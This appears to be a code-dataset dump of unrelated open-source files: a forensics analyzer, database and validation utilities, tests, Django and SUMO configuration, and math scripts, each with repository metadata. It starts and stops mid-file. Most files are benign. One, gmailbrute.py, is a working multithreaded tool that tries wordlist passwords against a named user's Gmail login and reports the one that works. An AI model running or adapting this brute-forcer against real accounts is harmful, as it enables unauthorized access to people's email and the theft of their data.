url_attribute = getattr(event_object, 'url', None)
if not url_attribute:
return
# Check if we are dealing with a web history event.
source, _ = eventdata.EventFormatterManager.GetSourceStrings(event_object)
if source != 'WEBHIST':
return
for filter_obj, call_backs in self._filter_dict.items():
call_back_name, call_back_object = call_backs
if filter_obj.Match(event_object):
returned_line = ScrubLine(call_back_object(url_attribute))
if not returned_line:
continue
self._counter[u'{}:{}'.format(call_back_name, returned_line)] += 1
def CompileReport(self):
"""Compiles a report of the analysis.
Returns:
The analysis report (instance of AnalysisReport).
"""
report = event.AnalysisReport()
results = {}
for key, count in self._counter.iteritems():
search_engine, _, search_term = key.partition(':')
results.setdefault(search_engine, {})
results[search_engine][search_term] = count
report.report_dict = results
lines_of_text = []
for search_engine, terms in sorted(results.items()):
lines_of_text.append(u' == ENGINE: {0:s} =='.format(search_engine))
for search_term, count in sorted(
terms.iteritems(), key=lambda x: (x[1], x[0]), reverse=True):
lines_of_text.append(u'{0:d} {1:s}'.format(count, search_term))
# An empty string is added to have SetText create an empty line.
lines_of_text.append(u'')
report.SetText(lines_of_text)
return report
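if __name__ == '__main__':
  # Minimal usage sketch of the URL extraction helpers above; the URLs are
  # made-up examples rather than data from any real event.
  sample_yandex = 'https://yandex.com/yandsearch?text=digital+forensics&lr=213'
  sample_gmail = 'https://mail.google.com/mail/u/0/#search/plaso+timeline/'
  assert FilterClass.Yandex(sample_yandex) == 'digital forensics'
  assert FilterClass.Gmail(sample_gmail) == 'plaso timeline'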
|
iwm911/plaso
|
plaso/analysis/browser_search.py
|
Python
|
apache-2.0
| 6,727
| 0.008771
|
import numpy as np
import pandas as pd
from lazy_property import LazyProperty
from . import _describe_template
from .plot import Plotter
from .. import bin_counts
from .. import numeric_datatypes, _pretty_print
from ..util import seaborn_required
class Column(object):
"""
In Pandas, a column of a DataFrame is represented as a Series.
Similarly, a column in a database table is represented by
an object from this class.
Note that the Series represented by these columns have the default index (ie non-negative, consecutive integers starting at zero). Thus, for the portion of the Pandas Series API mocked here, we need not worry about multilevel (hierarchical) indices.
"""
def __init__(self, name, parent_table):
"""
:param str name: The name of the column. Required.
:param pg_utils.table.Table parent_table: The table to which this column belongs. Required.
"""
self.parent_table = parent_table
self.name = name
self.is_numeric = parent_table._all_column_data_types[name] in numeric_datatypes
self.plot = Plotter(self)
def select_all_query(self):
"""
Provides the SQL used when selecting everything from this column.
:return: The SQL statement.
:rtype: str
"""
return "select {} from {}".format(self, self.parent_table)
def sort_values(self, ascending=True, limit=None, **sql_kwargs):
"""
Mimics the method `pandas.Series.sort_values <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.sort_values.html#pandas.Series.sort_values>`_.
:param int|None limit: Either a positive integer for the number of rows to take or ``None`` to take all.
:param bool ascending: Sort ascending vs descending.
:param dict sql_kwargs: A dictionary of keyword arguments passed into `pandas.read_sql <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql.html>`_.
:return: The resulting series.
:rtype: pandas.Series
"""
if limit is not None and (not isinstance(limit, int) or limit <= 0):
raise ValueError("limit must be a positive integer or None (got {})".format(limit))
sql = self.select_all_query() + " order by 1"
if not ascending:
sql += " desc"
if limit is not None:
sql += " limit {}".format(limit)
return pd.read_sql(sql, self.parent_table.conn, **sql_kwargs)[self.name]
def unique(self):
"""
Returns an array of unique values in this column. Includes ``null`` (represented as ``None``).
:return: The unique values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute("select distinct {} from {}".format(self, self.parent_table))
return np.array([x[0] for x in cur.fetchall()])
def hist(self, **kwargs):
return self.plot.hist(**kwargs)
def head(self, num_rows=10):
"""
Fetches some values of this column.
:param int|str num_rows: Either a positive integer number of values or the string `"all"` to fetch all values
:return: A NumPy array of the values
:rtype: np.array
"""
        if not ((isinstance(num_rows, int) and num_rows > 0) or
                num_rows == "all"):
raise ValueError("num_rows must be a positive integer or the string 'all'")
query = self.select_all_query()
if num_rows != "all":
query += " limit {}".format(num_rows)
cur = self.parent_table.conn.cursor()
cur.execute(query)
return np.array([x[0] for x in cur.fetchall()])
@LazyProperty
def is_unique(self):
"""
Determines whether or not the values of this column are all unique (ie whether this column is a unique identifier for the table).
:return: Whether or not this column contains unique values.
:rtype: bool
"""
cur = self.parent_table.conn.cursor()
cur.execute("""select {}
from {}
group by 1 having count(1) > 1""".format(self, self.parent_table))
return cur.fetchone() is None
@LazyProperty
def dtype(self):
"""
The ``dtype`` of this column (represented as a string).
:return: The ``dtype``.
:rtype: str
"""
return self.parent_table._all_column_data_types[self.name]
def _get_describe_query(self, percentiles=None, type_="continuous"):
if type_.lower() not in ["continuous", "discrete"]:
raise ValueError("The 'type_' parameter must be 'continuous' or 'discrete'")
if not self.is_numeric:
return None
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
elif not bool(percentiles):
percentiles = []
if not isinstance(percentiles, (list, tuple)):
percentiles = [percentiles]
if any([x < 0 or x > 1 for x in percentiles]):
raise ValueError(
"The `percentiles` attribute must be None or consist of numbers between 0 and 1 (got {})".format(
percentiles))
percentiles = sorted([float("{0:.2f}".format(p)) for p in percentiles if p > 0])
suffix = "cont" if type_.lower() == "continuous" else "desc"
query = _describe_template.render(column=self, percentiles=percentiles,
suffix=suffix, table=self.parent_table)
if self.parent_table.debug:
_pretty_print(query)
return query
def describe(self, percentiles=None, type_="continuous"):
"""
This mocks the method `pandas.Series.describe`, and provides
a series with the same data (just calculated by the database).
:param None|list[float] percentiles: A list of percentiles to evaluate (with numbers between 0 and 1). If not specified, quartiles (0.25, 0.5, 0.75) are used.
:param str type_: Specifies whether the percentiles are to be taken as discrete or continuous. Must be one of `"discrete"` or `"continuous"`.
:return: A series returning the description of the column, in the same format as ``pandas.Series.describe``.
:rtype: pandas.Series
"""
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
cur = self.parent_table.conn.cursor()
cur.execute(self._get_describe_query(percentiles=percentiles, type_=type_))
index = ["count", "mean", "std_dev", "minimum"] + \
["{}%".format(int(100 * p)) for p in percentiles] + \
["maximum"]
return pd.Series(cur.fetchone()[1:], index=index)
@seaborn_required
def distplot(self, bins=None, **kwargs):
"""
Produces a ``distplot``. See `the seaborn docs <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_ on ``distplot`` for more information.
Note that this requires Seaborn in order to function.
:param int|None bins: The number of bins to use. If unspecified, the `Freedman-Diaconis rule <https://en.wikipedia.org/wiki/Freedman%E2%80%93Diaconis_rule>`_ will be used to determine the number of bins.
:param dict kwargs: A dictionary of options to pass on to `seaborn.distplot <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_.
"""
import seaborn
bc = bin_counts.counts(self, bins=bins)
n = sum([entry[2] for entry in bc])
left = np.zeros(n)
right = np.zeros(n)
overall_index = 0
for entry in bc:
for i in range(entry[2]):
left[overall_index] = entry[0]
right[overall_index] = entry[1]
overall_index += 1
# We'll take our overall data points to be in the midpoint
# of each binning interval
# TODO: make this more configurable (left, right, etc)
return seaborn.distplot((left + right) / 2.0, **kwargs)
@LazyProperty
def values(self):
"""
Mocks the method `pandas.Series.values`, returning a simple NumPy array
consisting of the values of this column.
:return: The NumPy array containing the values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute(self.select_all_query())
return np.array([x[0] for x in cur.fetchall()])
def _calculate_aggregate(self, aggregate):
query = "select {}({}) from (\n{}\n)a".format(
aggregate, self, self.select_all_query())
cur = self.parent_table.conn.cursor()
cur.execute(query)
return cur.fetchone()[0]
@LazyProperty
def mean(self):
"""
Mocks the ``pandas.Series.mean`` method to give the mean of the values in this column.
:return: The mean.
:rtype: float
"""
return self._calculate_aggregate("avg")
@LazyProperty
def max(self):
"""
Mocks the ``pandas.Series.max`` method to give the maximum of the values in this column.
:return: The maximum.
:rtype: float
"""
return self._calculate_aggregate("max")
@LazyProperty
def min(self):
"""
        Mocks the ``pandas.Series.min`` method to give the minimum of the values in this column.
:return: The minimum.
:rtype: float
"""
return self._calculate_aggregate("min")
@LazyProperty
def size(self):
"""
Mocks the ``pandas.Series.size`` property to give a count of the values in this column.
:return: The count.
:rtype: int
"""
return self.parent_table.count
def __str__(self):
return self.name
def __repr__(self):
return "<{} '{}'>".format(self.__class__, self.name)
def __eq__(self, other):
if not isinstance(other, Column):
return False
return self.name == other.name and self.parent_table == other.parent_table
def __ne__(self, other):
return not self.__eq__(other)
|
jackmaney/pg-utils
|
pg_utils/column/base.py
|
Python
|
mit
| 10,187
| 0.002945
|
import re
from calendar import monthrange
import datetime
class Card(object):
"""
A credit card that may be valid or invalid.
"""
# A regexp for matching non-digit values
non_digit_regexp = re.compile(r'\D')
# A mapping from common credit card brands to their number regexps
BRAND_VISA = 'visa'
BRAND_MASTERCARD = 'mastercard'
BRAND_AMEX = 'amex'
BRAND_DISCOVER = 'discover'
BRAND_DANKORT = 'dankort'
BRAND_MAESTRO = 'maestro'
BRAND_DINERS = 'diners'
BRAND_UNKNOWN = u'unknown'
BRANDS = {
BRAND_VISA: re.compile(r'^4\d{12}(\d{3})?$'),
BRAND_MASTERCARD: re.compile(r'''
^(5[1-5]\d{4}|677189)\d{10}$| # Traditional 5-series + RU support
^(222[1-9]|2[3-6]\d{2}|27[0-1]\d|2720)\d{12}$ # 2016 2-series
''', re.VERBOSE),
BRAND_AMEX: re.compile(r'^3[47]\d{13}$'),
BRAND_DISCOVER: re.compile(r'^(6011|65\d{2})\d{12}$'),
BRAND_DANKORT: re.compile(r'^(5019)\d{12}$'),
BRAND_MAESTRO:
re.compile(r'^(?:5[0678]\d\d|6304|6390|67\d\d)\d{8,15}$'),
BRAND_DINERS:
re.compile(r'^3(?:0[0-5]|[68][0-9])[0-9]{11}$'),
}
FRIENDLY_BRANDS = {
BRAND_VISA: 'Visa',
BRAND_MASTERCARD: 'MasterCard',
BRAND_AMEX: 'American Express',
BRAND_DISCOVER: 'Discover',
BRAND_DANKORT: 'Dankort',
BRAND_MAESTRO: 'Maestro',
BRAND_DINERS: 'Diners Club',
}
# Common test credit cards
TESTS = (
'4444333322221111',
'378282246310005',
'371449635398431',
'378734493671000',
'30569309025904',
'38520000023237',
'6011111111111117',
'6011000990139424',
        '5555555555554444',
'5105105105105100',
'4111111111111111',
'4012888888881881',
'4222222222222',
)
# Stripe test credit cards
TESTS += (
'4242424242424242',
)
def __init__(self, number, month, year, cvc, holder=None):
"""
Attaches the provided card data and holder to the card after removing
non-digits from the provided number.
"""
self.number = self.non_digit_regexp.sub('', number)
self.exp_date = ExpDate(month, year)
self.cvc = cvc
self.holder = holder
def __repr__(self):
"""
Returns a typical repr with a simple representation of the masked card
number and the exp date.
"""
return u'<Card brand={b} number={n}, exp_date={e}>'.format(
b=self.brand,
n=self.mask,
e=self.exp_date.mmyyyy
)
@property
def mask(self):
"""
        Returns the credit card number with all but the last four digits
        replaced by an X, formatted the way
they appear on their respective brands' cards.
"""
# If the card is invalid, return an "invalid" message
if not self.is_mod10_valid:
return u'invalid'
# If the card is an Amex, it will have special formatting
if self.brand == self.BRAND_AMEX:
return u'XXXX-XXXXXX-X{e}'.format(e=self.number[11:15])
# All other cards
return u'XXXX-XXXX-XXXX-{e}'.format(e=self.number[12:16])
@property
def brand(self):
"""
Returns the brand of the card, if applicable, else an "unknown" brand.
"""
# Check if the card is of known type
for brand, regexp in self.BRANDS.items():
if regexp.match(self.number):
return brand
# Default to unknown brand
return self.BRAND_UNKNOWN
@property
def friendly_brand(self):
"""
Returns the human-friendly brand name of the card.
"""
return self.FRIENDLY_BRANDS.get(self.brand, 'unknown')
@property
def is_test(self):
"""
Returns whether or not the card's number is a known test number.
"""
return self.number in self.TESTS
@property
def is_expired(self):
"""
Returns whether or not the card is expired.
"""
return self.exp_date.is_expired
@property
def is_valid(self):
"""
Returns whether or not the card is a valid card for making payments.
"""
return not self.is_expired and self.is_mod10_valid
@property
def is_mod10_valid(self):
"""
Returns whether or not the card's number validates against the mod10
algorithm (Luhn algorithm), automatically returning False on an empty
value.
"""
# Check for empty string
if not self.number:
return False
# Run mod10 on the number
dub, tot = 0, 0
for i in range(len(self.number) - 1, -1, -1):
for c in str((dub + 1) * int(self.number[i])):
tot += int(c)
dub = (dub + 1) % 2
return (tot % 10) == 0
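# A standalone sketch of the same mod10 (Luhn) check used by Card.is_mod10_valid
# above, written out step by step purely for illustration; it is not used by
# the classes in this module.
def _luhn_check_sketch(number):
    """Return True if the digit string `number` passes the Luhn check."""
    total = 0
    for offset, char in enumerate(reversed(number)):
        digit = int(char)
        if offset % 2 == 1:
            # Double every second digit from the right...
            digit *= 2
            # ...and add the digits of the result (same as subtracting 9).
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0
# For example, _luhn_check_sketch('4111111111111111') is True.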
class ExpDate(object):
"""
An expiration date of a credit card.
"""
def __init__(self, month, year):
"""
Attaches the last possible datetime for the given month and year, as
well as the raw month and year values.
"""
# Attach month and year
self.month = month
self.year = year
# Get the month's day count
weekday, day_count = monthrange(year, month)
# Attach the last possible datetime for the provided month and year
self.expired_after = datetime.datetime(
year,
month,
day_count,
23,
59,
59,
999999
)
def __repr__(self):
"""
Returns a typical repr with a simple representation of the exp date.
"""
return u'<ExpDate expired_after={d}>'.format(
d=self.expired_after.strftime('%m/%Y')
)
@property
def is_expired(self):
"""
Returns whether or not the expiration date has passed in American Samoa
(the last timezone).
"""
# Get the current datetime in UTC
utcnow = datetime.datetime.utcnow()
# Get the datetime minus 11 hours (Samoa is UTC-11)
samoa_now = utcnow - datetime.timedelta(hours=11)
        # Return whether the expired_after time has passed in American Samoa
return samoa_now > self.expired_after
@property
def mmyyyy(self):
"""
Returns the expiration date in MM/YYYY format.
"""
return self.expired_after.strftime('%m/%Y')
@property
def mmyy(self):
"""
        Returns the expiration date in MM/YY format (the same format as is
        printed on cards).
"""
return self.expired_after.strftime('%m/%y')
@property
def MMYY(self):
"""
Returns the expiration date in MMYY format
"""
return self.expired_after.strftime('%m%y')
@property
def mm(self):
"""
Returns the expiration date in MM format.
"""
return self.expired_after.strftime('%m')
@property
def yyyy(self):
"""
Returns the expiration date in YYYY format.
"""
return self.expired_after.strftime('%Y')
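if __name__ == '__main__':
    # Minimal usage sketch of ExpDate; the date is arbitrary and far in the
    # future so the example stays non-expired.
    _exp = ExpDate(month=12, year=2099)
    assert _exp.mmyy == '12/99'
    assert _exp.mmyyyy == '12/2099'
    assert not _exp.is_expired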
|
orokusaki/pycard
|
pycard/card.py
|
Python
|
mit
| 7,293
| 0
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for parser module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.python.platform import test
class ParserTest(test.TestCase):
def test_parse_entity(self):
def f(x):
return x + 1
mod, _ = parser.parse_entity(f)
self.assertEqual('f', mod.body[0].name)
def test_parse_str(self):
mod = parser.parse_str(
textwrap.dedent("""
def f(x):
return x + 1
"""))
self.assertEqual('f', mod.body[0].name)
def test_parse_expression(self):
node = parser.parse_expression('a.b')
self.assertEqual('a', node.value.id)
self.assertEqual('b', node.attr)
if __name__ == '__main__':
test.main()
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/pyct/parser_test.py
|
Python
|
apache-2.0
| 1,514
| 0.003303
|
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
|
knightmare2600/d4rkc0de
|
bruteforce/gmailbrute.py
|
Python
|
gpl-2.0
| 2,738
| 0.039445
|
#Aditya Joshi
#Enumerating Oriented Gene Ordering
from itertools import permutations,product
from math import fabs
n = int(raw_input())
def make_set(n):
set = []
for x in range(1,n+1):
set += [x]
return set
def plusAndMinusPermutations(items):
for p in permutations(items,len(items)):
for signs in product([-1,1], repeat=len(items)):
yield [a*sign for a,sign in zip(p,signs)]
def array_to_string(items):
    # Join every signed element, not just the first two, so the output is
    # correct for any n.
    return " ".join(str(x) for x in items)
count = 0
for x in plusAndMinusPermutations(make_set(n)):
print array_to_string(x)
count += 1
print count
|
adijo/rosalind
|
old/gene_enumerations.py
|
Python
|
gpl-2.0
| 682
| 0.014663
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from SI import meter, second
gal = 0.01*meter/second**2
# version
__id__ = "$Id: force.py,v 1.1.1.1 2005/03/08 16:13:41 aivazis Exp $"
#
# End of file
|
bmi-forum/bmi-pyre
|
pythia-0.8/packages/pyre/pyre/units/force.py
|
Python
|
gpl-2.0
| 545
| 0
|
from .base import *
import dj_database_url
if os.environ.get('DEBUG') == 'False':
DEBUG = False
else:
DEBUG = True
try:
from .local import *
except ImportError:
pass
ALLOWED_HOSTS = ['*']
DATABASES = {'default': dj_database_url.config()}
SOCIAL_AUTH_YAMMER_KEY = os.environ.get('SOCIAL_AUTH_YAMMER_KEY')
SOCIAL_AUTH_YAMMER_SECRET = os.environ.get('SOCIAL_AUTH_YAMMER_SECRET')
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
STATICFILES_STORAGE = 'core.storage.S3PipelineManifestStorage'
STATIC_URL = 'http://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
AWS_QUERYSTRING_AUTH = False
AWS_S3_FILE_OVERWRITE = True
PIPELINE_JS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_CSS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_YUGLIFY_BINARY = '/app/.heroku/python/bin/yuglify'
|
kave/Face-Off
|
face-off/settings/production.py
|
Python
|
cc0-1.0
| 866
| 0.001155
|
import datetime
import logging
from functools import reduce
from flask_babelpkg import lazy_gettext
from .filters import Filters
log = logging.getLogger(__name__)
class BaseInterface(object):
"""
Base class for all data model interfaces.
Sub class it to implement your own interface for some data engine.
"""
obj = None
filter_converter_class = None
""" when sub classing override with your own custom filter converter """
""" Messages to display on CRUD Events """
add_row_message = lazy_gettext('Added Row')
edit_row_message = lazy_gettext('Changed Row')
delete_row_message = lazy_gettext('Deleted Row')
delete_integrity_error_message = lazy_gettext('Associated data exists, please delete them first')
add_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
edit_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
general_error_message = lazy_gettext('General Error')
""" Tuple with message and text with severity type ex: ("Added Row", "info") """
message = ()
def __init__(self, obj):
self.obj = obj
def _get_attr_value(self, item, col):
if not hasattr(item, col):
# it's an inner obj attr
return reduce(getattr, col.split('.'), item)
if hasattr(getattr(item, col), '__call__'):
            # it's a function, so call it
return getattr(item, col)()
else:
            # it's a plain attribute
return getattr(item, col)
def get_filters(self, search_columns=None):
search_columns = search_columns or []
return Filters(self.filter_converter_class, self, search_columns)
def get_values_item(self, item, show_columns):
return [self._get_attr_value(item, col) for col in show_columns]
def _get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
retlst = []
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
retlst.append(retdict)
return retlst
def get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
yield retdict
def get_values_json(self, lst, list_columns):
"""
Converts list of objects from query to JSON
"""
result = []
for item in self.get_values(lst, list_columns):
for key, value in list(item.items()):
if isinstance(value, datetime.datetime) or isinstance(value, datetime.date):
value = value.isoformat()
item[key] = value
if isinstance(value, list):
item[key] = [str(v) for v in value]
result.append(item)
return result
"""
    Returns the model's class name,
    useful for auto titles on views
"""
@property
def model_name(self):
return self.obj.__class__.__name__
"""
Next methods must be overridden
"""
def query(self, filters=None, order_column='', order_direction='',
page=None, page_size=None):
pass
def is_image(self, col_name):
return False
def is_file(self, col_name):
return False
def is_gridfs_file(self, col_name):
return False
def is_gridfs_image(self, col_name):
return False
def is_string(self, col_name):
return False
def is_text(self, col_name):
return False
def is_integer(self, col_name):
return False
def is_float(self, col_name):
return False
def is_boolean(self, col_name):
return False
def is_date(self, col_name):
return False
def is_datetime(self, col_name):
return False
def is_relation(self, prop):
return False
def is_relation_col(self, col):
return False
def is_relation_many_to_one(self, prop):
return False
def is_relation_many_to_many(self, prop):
return False
def is_relation_one_to_one(self, prop):
return False
def is_relation_one_to_many(self, prop):
return False
def is_nullable(self, col_name):
return True
def is_unique(self, col_name):
return False
def is_pk(self, col_name):
return False
def is_fk(self, col_name):
return False
def get_max_length(self, col_name):
return -1
def get_min_length(self, col_name):
return -1
"""
-----------------------------------------
FUNCTIONS FOR CRUD OPERATIONS
-----------------------------------------
"""
def add(self, item):
"""
Adds object
"""
raise NotImplementedError
def edit(self, item):
"""
Edit (change) object
"""
raise NotImplementedError
def delete(self, item):
"""
Deletes object
"""
raise NotImplementedError
def get_col_default(self, col_name):
pass
def get_keys(self, lst):
"""
return a list of pk values from object list
"""
pk_name = self.get_pk_name()
return [getattr(item, pk_name) for item in lst]
    def get_pk_name(self):
"""
Returns the primary key name
"""
raise NotImplementedError
def get_pk_value(self, item):
return getattr(item, self.get_pk_name())
def get(self, pk):
"""
return the record from key
"""
pass
def get_related_model(self, prop):
raise NotImplementedError
def get_related_interface(self, col_name):
"""
Returns a BaseInterface for the related model
of column name.
:param col_name: Column name with relation
:return: BaseInterface
"""
raise NotImplementedError
def get_related_obj(self, col_name, value):
raise NotImplementedError
def get_related_fk(self, model):
raise NotImplementedError
def get_columns_list(self):
"""
Returns a list of all the columns names
"""
return []
def get_user_columns_list(self):
"""
Returns a list of user viewable columns names
"""
return self.get_columns_list()
def get_search_columns_list(self):
"""
Returns a list of searchable columns names
"""
return []
def get_order_columns_list(self, list_columns=None):
"""
Returns a list of order columns names
"""
return []
def get_relation_fk(self, prop):
pass
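# A minimal, hypothetical sketch (all names below are made up) showing how the
# generic value helpers above resolve plain attributes, callables and dotted
# inner-object attributes for a single row object.
def _base_interface_value_sketch():
    class _Owner(object):
        name = 'alice'

    class _Item(object):
        title = 'hello'
        owner = _Owner()

        def upper_title(self):
            return self.title.upper()

    interface_obj = BaseInterface(obj=None)
    # Returns ['hello', 'HELLO', 'alice'].
    return interface_obj.get_values_item(
        _Item(), ['title', 'upper_title', 'owner.name'])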
|
rpiotti/Flask-AppBuilder
|
flask_appbuilder/models/base.py
|
Python
|
bsd-3-clause
| 7,479
| 0.00107
|
"""
@file sumoConfigGen.py
@author Craig Rafter
@date 29/01/2016
Code to generate a config file for a SUMO model.
"""
def sumoConfigGen(modelname='simpleT', configFile='./models/simpleT.sumocfg',
exportPath='../', AVratio=0, stepSize=0.01,
run=0, port=8813):
configXML = open(configFile, 'w')
print >> configXML, """<configuration>
<input>
<net-file value="{model}.net.xml"/>
<route-files value="{model}.rou.xml"/>
<gui-settings-file value="gui-settings.cfg"/>
<game value="1"/>
<start value="1"/>
<!--additional-files value="{model}.det.xml"/-->
</input>
<output>
<!--<summary-output value="{expPath}summary{AVR:03d}_{Nrun:03d}.xml"/>-->
<!--tripinfo-output value="{expPath}tripinfo{AVR:03d}_{Nrun:03d}.xml"/-->
<!--<vehroute-output value="{expPath}vehroute{AVR:03d}_{Nrun:03d}.xml"/-->
<!--queue-output value="{expPath}queuedata{AVR:03d}_{Nrun:03d}.xml"/-->
</output>
<time>
<begin value="0"/>
<step-length value="{stepSz}"/>
</time>
<processing>
<!--TURN OFF TELEPORTING-->
<time-to-teleport value="-1"/>
</processing>
<report>
<no-step-log value="true"/>
<error-log value="logfile.txt"/>
</report>
<traci_server>
<remote-port value="{SUMOport}"/>
</traci_server>""".format(model=modelname, expPath=exportPath,
AVR=int(AVratio*100), stepSz=stepSize,
Nrun=run, SUMOport=port)
print >> configXML, "</configuration>"
configXML.close()
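# Minimal usage sketch: write a config for the default 'simpleT' model with a
# 10% AV ratio on the default TraCI port. The paths are illustrative only.
if __name__ == '__main__':
    sumoConfigGen(modelname='simpleT',
                  configFile='./models/simpleT.sumocfg',
                  exportPath='../results/',
                  AVratio=0.1,
                  stepSize=0.01,
                  run=1,
                  port=8813)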
|
cbrafter/CrowdTLL
|
generalCode/sumoConfigGen.py
|
Python
|
gpl-3.0
| 1,642
| 0.001827
|
from __future__ import absolute_import
from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None, proxy_basic_auth=None, disable_cache=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
b64encode(b(basic_auth)).decode('utf-8')
if proxy_basic_auth:
headers['proxy-authorization'] = 'Basic ' + \
b64encode(b(proxy_basic_auth)).decode('utf-8')
if disable_cache:
headers['cache-control'] = 'no-cache'
return headers
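if __name__ == '__main__':
    # A small extra usage sketch mirroring the docstring examples above; the
    # credentials are placeholders.
    example = make_headers(basic_auth='user:pass', disable_cache=True)
    assert example['cache-control'] == 'no-cache'
    assert example['authorization'] == 'Basic dXNlcjpwYXNz'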
|
la0rg/Genum
|
GenumCore/vendor/urllib3/util/request.py
|
Python
|
mit
| 2,180
| 0.000917
|
'''
Problem 2
@author: Kevin Ji
'''
def sum_even_fibonacci( max_value ):
# Initial two elements
prev_term = 1
cur_term = 2
temp_sum = 2
while cur_term < max_value:
next_term = prev_term + cur_term
prev_term = cur_term
cur_term = next_term
        # Only count terms that are even and still below max_value.
